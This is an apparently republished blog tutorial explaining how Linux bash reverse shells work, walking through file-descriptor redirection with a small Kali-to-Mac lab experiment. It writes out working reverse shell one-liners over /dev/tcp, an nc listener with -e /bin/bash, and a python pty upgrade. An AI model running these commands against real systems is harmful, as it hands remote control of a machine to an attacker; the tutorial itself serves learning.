The principle of linux reverse shell

Others 2020-09-25 19:29:38 views: null

Full command

Reverse shell command:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i > /dev/tcp/ip/port 0>&1 2>&1

Use nc reverse shell:

nc -lvvp 12345 -t -e /bin/bash

principle

bash -i> /dev/tcp/ip/port 0>&1 2>&1
bash -i opens an interactive bash
& is to distinguish between file 1 and file descriptor 1,
a>&b means a>b 2> &1
0 stands for input, 0>&1 means that the value entered on the output window is regarded as the input of the current window. After the rebound shell, there will be two windows, namely the shell window of the target machine and the shell port of the attacking machine. The meaning of this command can also be understood as taking the input of the attacker's window as the input of the target's window and finally inputting it to the target. 2 represents standard error output.

experiment

Help everyone understand through a small experiment

The first step is to redirect the correct output of the shell to an external host

Suppose the command we entered on kali is:,
bash -i > /dev/tcp/192.168.124.1/9999this sentence means to redirect the standard output of the interactive shell to port 9999 of 192.168.124.1.

The listening port command on mac is: nc -l 9999
Insert picture description here

First, I entered the whoami command on kali, and found that there was no echo because the echo was redirected to the mac.

Insert picture description here

But when we enter and exit wrong commands on kali, there is an echo.
Insert picture description here

The second step is to redirect the error output to an external host

We only need to add 2>&1 after the above command, which means to redirect the error output to the standard output, that is, to our external host.
Insert picture description here

At this time, I found that pressing the keyboard on kali did not have any echo, and all the echoes appeared on the mac shell:
Insert picture description here

This is because we have redirected all the output to the external host, but the problem is that our control is still on kali, and the mac cannot perform any output operations and can only display the output. At this time, we need to give the input permissions to our mac.

The third step is to hand over input permissions

Just add 0>&1 to the second step command.

Insert picture description here

At this time, Kali's shell can be fully controlled on the mac, and the experiment is over.

other

Use python's virtual terminal when the shell is unstable:

python -c "import pty;pty.spawn('/bin/bash')"

Reference:
https://www.freebuf.com/news/142195.html #Convert the shell to a full tty
https://blog.csdn.net/Auuuuuuuu/article/details/89059176
https://www.anquanke.com /post/id/87017

Guess you like

Origin blog.csdn.net/qq_41874930/article/details/108195810
Recommended
Arc Browser for Windows 1.0 officially GA
A programmer born in the 1990s developed a video porting software and made over 7 million in less than a year. The ending was very punishing!
Ranking
1. Select Sort
Create a thread thread
3 press to play ball that reach 6
Programmation CUDA (4) : gestion de la mémoire
SpringBoot database connection pool Druid error
E Diudiu App redesign summary
4EVERLAND Hosting now supports SNS+IPFS
About HTTPS
[vue3+vite+ts+element-plu+sass] uses bug records in sass
Interpretation of HUAWEI CLOUD GaussDB (for Influx): Best Practice Data Modeling
Daily
More
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)

Code World

© 2018 codetd.com